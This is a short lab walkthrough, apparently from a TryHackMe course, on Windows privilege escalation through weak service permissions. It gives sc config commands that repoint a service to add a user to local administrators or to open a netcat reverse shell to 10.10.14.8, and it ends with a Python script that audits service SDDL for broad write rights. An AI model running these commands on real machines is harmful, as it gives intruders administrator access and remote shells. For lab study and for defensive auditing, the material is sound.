Binary Paths

Overview

Windows services have an executable attached to them, set in the service's binary path. If we have the right permissions on the service, we can change the binary path to a malicious executable or command.

Exploitation using PowerUp

Run PowerUp on the machine

. .\PowerUp.ps1
Invoke-AllChecks
TCM Windows Priv Esc on Try Hack Me

Change the binary path

sc config daclsvc binpath= "net localgroup administrators Greg /add"
sc config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" 

Start service

sc start daclsvc

Exploitation via Accesschk64

Check for services with write permissions

accesschk64.exe -accepteula -uwcv Everyone *
accesschk64.exe -uwcv daclsvc

Query the service

sc qc daclsvc

Changing the binary path works the same way as in the PowerUp method above.
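
The permission check above can also be run as a defensive audit. The following is an added example, not part of the original page: it parses service security descriptors in SDDL form (the format `sc sdshow` prints) and flags allow ACEs that give broad groups the rights needed to change a binary path. The function names and the sample SDDL strings, including the one labelled daclsvc, are constructed for illustration.

```python
import re

# SDDL right codes / access-mask bits that let a trustee repoint or re-ACL a service.
RISKY = {
    "DC": (0x00000002, "SERVICE_CHANGE_CONFIG"),
    "WD": (0x00040000, "WRITE_DAC"),
    "WO": (0x00080000, "WRITE_OWNER"),
    "GA": (0x10000000, "GENERIC_ALL"),
    "GW": (0x40000000, "GENERIC_WRITE"),
}
# Broad, low-privilege trustees: SDDL alias or the equivalent SID.
BROAD = {
    "WD": "Everyone", "S-1-1-0": "Everyone",
    "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
    "BU": "BUILTIN\\Users", "S-1-5-32-545": "BUILTIN\\Users",
    "IU": "INTERACTIVE", "S-1-5-4": "INTERACTIVE",
}

def risky_rights(rights):
    """Return the risky rights in an ACE rights field (two-letter codes or a hex mask)."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return sorted(name for bit, name in RISKY.values() if mask & bit)
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return sorted(RISKY[c][1] for c in codes if c in RISKY)

def audit_service_sddl(sddl):
    """List (trustee, risky rights) for allow ACEs in the DACL; the SACL (S:) is ignored."""
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "A":
            continue  # skip malformed, deny and audit ACEs
        rights = risky_rights(fields[2])
        if fields[5] in BROAD and rights:
            findings.append((BROAD[fields[5]], rights))
    return findings

# Constructed SDDL strings (not captured from the lab), in the format `sc sdshow <service>` prints.
SAMPLES = {
    "daclsvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCDCLCSWRPWPLOCRRC;;;WD)",
    "hardened": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "hexmask": "O:SYG:SYD:PAI(A;;0xf01ff;;;AU)",
}
if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, audit_service_sddl(sddl) or "no broad write access")
```

Any service this reports should have the flagged ACE removed or narrowed so that only administrators and SYSTEM keep change-config, write-DAC and write-owner rights.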
